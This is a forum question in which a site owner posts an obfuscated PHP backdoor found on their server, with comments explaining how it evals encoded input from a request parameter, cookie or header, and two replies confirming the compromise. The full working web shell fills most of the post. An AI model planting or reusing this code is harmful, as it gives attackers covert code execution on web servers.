
I found a suspicious, obfuscated PHP file on my website. I assume this means my website was successfully hacked? Can anyone tell me what this code is doing?

fuifsaat.php

<?php
// SECURITY NOTE: this file is an obfuscated remote-code-execution backdoor, not
// application code. Its presence should be treated as evidence of compromise.
//
// How it hides:
//   - Each assignment below stores a short pool of characters. Most of the
//     variables are never read again; a subset ($assertive, $arney, $crowing,
//     $attempts, ...) is indexed one character at a time to spell out function
//     names and superglobals at runtime, so none of them appear literally in
//     the file and simple keyword scans (eval, base64_decode, $_REQUEST) miss it.
//
// What it does when requested:
//   1. $bash is concatenated into the string "create_function".
//   2. $lam = create_function(' ', BODY), where BODY evals the last argument the
//      generated function receives (array_pop over func_get_args()).
//   3. $lam is called with ten throwaway one-character arguments followed by one
//      long string; only that final string is executed.
//   4. The final string merges $_REQUEST, $_COOKIE and $_SERVER and looks up the
//      key "uprnrqnv" (request parameter or cookie) and, failing that,
//      "HTTP_UPRNRQNV" (how PHP exposes a request header named Uprnrqnv).
//      If neither is present it calls die and produces no output.
//      Otherwise the supplied value is run through strrev, base64_decode and
//      strrev again and passed to eval, i.e. the sender's PHP runs with the
//      privileges of the PHP process.
//
// Notes for responders:
//   - The key names above are usable as indicators when reviewing request,
//     WAF or proxy logs. Cookie and header values are often not logged, so a
//     clean access log does not show the backdoor was never used.
//   - create_function() was deprecated in PHP 7.2 and removed in PHP 8.0, so
//     the file only works on older runtimes.
//   - Deleting this file alone does not address how it was written to disk.

// Character pools. Only some of these are referenced by the expressions further down.
$hereto= '](^';$canon =':';$heroine= '(rp:L'; $deceitful= 'Z]Qe<'; $blacks =':Ntiu-_['; $broadcasting= 'T'; $levees ='T"($4n';$bilked='N'; $hitters='e';$drill = '"9t';
$franklin ='(tr'; $clarie ='f';$decomposing= '['; $demetra ='v';$knapsack ='$';$congratulated='s';$canners= 'HPFcd;'; $glenna= 'd(o=kqah'; $hamil= 'Y';$jennette ='('; $dwarfs='i';$buffeted= ')ni='; $assembly='ey';
$craze = 'o>e"rsEa';$chieftains ='v';$helplessly='A'; $clasping='"'; $clusters= 'OQ_6i]p';

$gown='N';
$handfuls ='`'; $bilks= 'p';

$chemist = 'V';$cathode = 'l"*JN';$birds = 'cD)ngi'; $climbed= 'r__rn__';$barons= '$s]jKa';$arrear = 'I';
$blown=')';$earls = 'n';

$jailed ='m'; $icebergs= ')cQ';$assuringly ='.';$appealer= 'a';$hangover ='d';$cradled ='a)pR(Urar';$although= 'G'; $grasping='5'; $madmax ='r';
$decrements ='sc)';

$commending= 'Q';$expensive = 'vln';$expedites = 'laMsr';
$gale='_';$fum = 'e'; $interrogative= 'V';

$flurry = '[';

$ann ='r'; $crops = 'ePE';

$formatters = 'T';$buses= 'g';
$enhanced='RRi'; $leontine= 'u';
$beatriz = 't';$eloquently='+';$anticipates='v';
$darrick= 'Caden?yq';$doubtlessly='P_4vuPW';$deviant = 'i';$cosmology='tE';
$industrials= 'e)'; $leandra = '0';$discerned= 'n'; $helga= '"';$colander= 'ie6u';$helical = 'v,prPXeT_';

$bespeak= 'e';$lissy = 'U';$benedict='E,U;SEV';
$beggarly='71?'; $finality= 'TR'; $briar='H'; $effect= '?'; $geodesic= 'NmeaaS';

$justiciable='rBf$aI;';$engineering='S)seg';

$kidney='o';$endear= 'r'; $hillard = '(';$food='t';$giggling=')';$glider = ' ';

$lezley='_'; $arney='sR;$aH';$flawed='e@(=$iR'; $circularly= 'R)'; $dotes='C';
$conant='2'; $attempts= ']RTf;O)';
$healthfully ='_';$beachhead='VKr$E'; $communists = 'e"$$Ug'; $embellishments ='ssv'; $detailing='q';$latches ='8';$crisscross='(u'; $delightful ='i'; $crowing ='t[3_b"r,[';$immodest ='o'; $assertive= 'tbOe'; $cloudburst = 'r'; $inflamed= '$'; $diet= 'c';$enos= '(';$ftp ='/';

// $bash spells "create_function"; $amendments is a single space used as the
// (empty) parameter list; $lam receives the generated function's name.
$bash= $diet .$cloudburst .$assertive['3'] . $arney[4] . $assertive[0] .
$assertive['3']. $crowing['3'] . $attempts['3'].$crisscross['1'].$discerned. $diet .
$assertive[0] .$delightful . $immodest.$discerned ; $amendments =$glider; $lam =$bash($amendments,$assertive['3'].

// Second argument to create_function: a body that evals the last argument
// passed to the generated function.
$embellishments['2'].$arney[4] .$expedites['0'] .$enos.$arney[4] . $cloudburst . $cloudburst. $arney[4].$darrick['6'] . $crowing['3'] .$helical['2'] .
$immodest .

$helical['2'].
$enos .$attempts['3'].$crisscross['1'] .$discerned . $diet.$crowing['3'].
$communists['5'] . $assertive['3'] . $assertive[0].
$crowing['3'] .

$arney[4].$cloudburst.
$communists['5'].
$embellishments['1'] .
$enos .$attempts['6'].

$attempts['6'] .

$attempts['6']. $attempts['4']);$lam

// Call of the generated function. The first ten arguments are one-character
// decoys; the final concatenated argument is the payload that gets eval'd
// (input lookup under "uprnrqnv" / "HTTP_UPRNRQNV", decode, eval).
($flawed[1] , $deceitful['0'] ,
$hamil,$crowing['3'],
$attempts['4'], $commending ,$beachhead['0'] , $hamil ,$crowing['2'], $doubtlessly['6'], $inflamed . $delightful. $flawed['3'] . $arney[4].$cloudburst . $cloudburst. $arney[4] .
$darrick['6']. $crowing['3'] .

$geodesic['1'] .
$assertive['3'] .$cloudburst. $communists['5']. $assertive['3'].$enos. $inflamed.$crowing['3'].$attempts['1'] . $beachhead['4'] . $commending .$communists[4] .$beachhead['4'] . $engineering['0'] .$attempts[2] .$crowing['7'] .
$inflamed.

$crowing['3'] . $dotes .$assertive['2'].$assertive['2'] . $beachhead[1].$justiciable['5'].
$beachhead['4'].
$crowing['7'] . $inflamed . $crowing['3'].
$engineering['0']. $beachhead['4'] . $attempts['1'] .$beachhead['0'].
$beachhead['4'].$attempts['1'].$attempts['6'] .

$attempts['4'].
$inflamed.

$arney[4]. $flawed['3']. $delightful.$embellishments['1'] . $embellishments['1'] .$assertive['3'] .$assertive[0]. $enos.$inflamed . $delightful.$crowing['8'] . $crowing['5'] .$crisscross['1'].$helical['2'] .$cloudburst . $discerned.$cloudburst. $detailing .
$discerned.$embellishments['2'].$crowing['5'] .$attempts[0] . $attempts['6'] .$effect .

$inflamed. $delightful . $crowing['8'].$crowing['5'] . $crisscross['1'].$helical['2'] .$cloudburst.

$discerned.$cloudburst . $detailing.$discerned. $embellishments['2'] . $crowing['5'] .
$attempts[0]. $blacks['0'].

$enos.

$delightful . $embellishments['1']. $embellishments['1'] .$assertive['3'].
$assertive[0]. $enos .$inflamed. $delightful.$crowing['8'] .$crowing['5'] .$arney['5'].$attempts[2] .$attempts[2] . $helical[4]. $crowing['3'] . $communists[4] . $helical[4].$attempts['1'] . $geodesic['0'] .$attempts['1'] .$commending .$geodesic['0'].$beachhead['0'] . $crowing['5'] .$attempts[0] . $attempts['6']. $effect. $inflamed.$delightful .$crowing['8'].

$crowing['5'] . $arney['5'] .$attempts[2] . $attempts[2]. $helical[4].
$crowing['3'] . $communists[4] . $helical[4] .$attempts['1'] .$geodesic['0'] . $attempts['1']. $commending.$geodesic['0'] .

$beachhead['0'].

$crowing['5'] . $attempts[0].

$blacks['0'].$darrick['2'].$delightful.$assertive['3'] . $attempts['6'] . $attempts['4'] .$assertive['3'].$embellishments['2']. $arney[4] . $expedites['0'] . $enos.$embellishments['1'] .$assertive[0].$cloudburst .$cloudburst. $assertive['3'] .

$embellishments['2'].$enos . $assertive['1'] . $arney[4].
$embellishments['1'].$assertive['3'] . $colander['2'] . $doubtlessly['2'] .$crowing['3'].$darrick['2'].$assertive['3'] .$diet .$immodest. $darrick['2']. $assertive['3'] .$enos .$embellishments['1'].$assertive[0].$cloudburst . $cloudburst. $assertive['3']. $embellishments['2'].$enos .

$inflamed .$arney[4].
$attempts['6'].$attempts['6'] .
$attempts['6']. $attempts['6'].$attempts['4'] );
Kevin
  • Yes, it looks like your website could be compromised: either someone was able to log in using your FTP credentials, or someone was able to upload this file via a file upload script already present on your website. Either way, I would consider your whole website compromised. You should remove the script and continue from there. – Kevin Jan 04 '19 at 00:45
  • Yes, programmers try so hard to make their code as readable as possible for future revisits. I do PHP and I can say this is obfuscated on multiple levels. – Abel Melquiades Callejo Jan 04 '19 at 02:27

0 Answers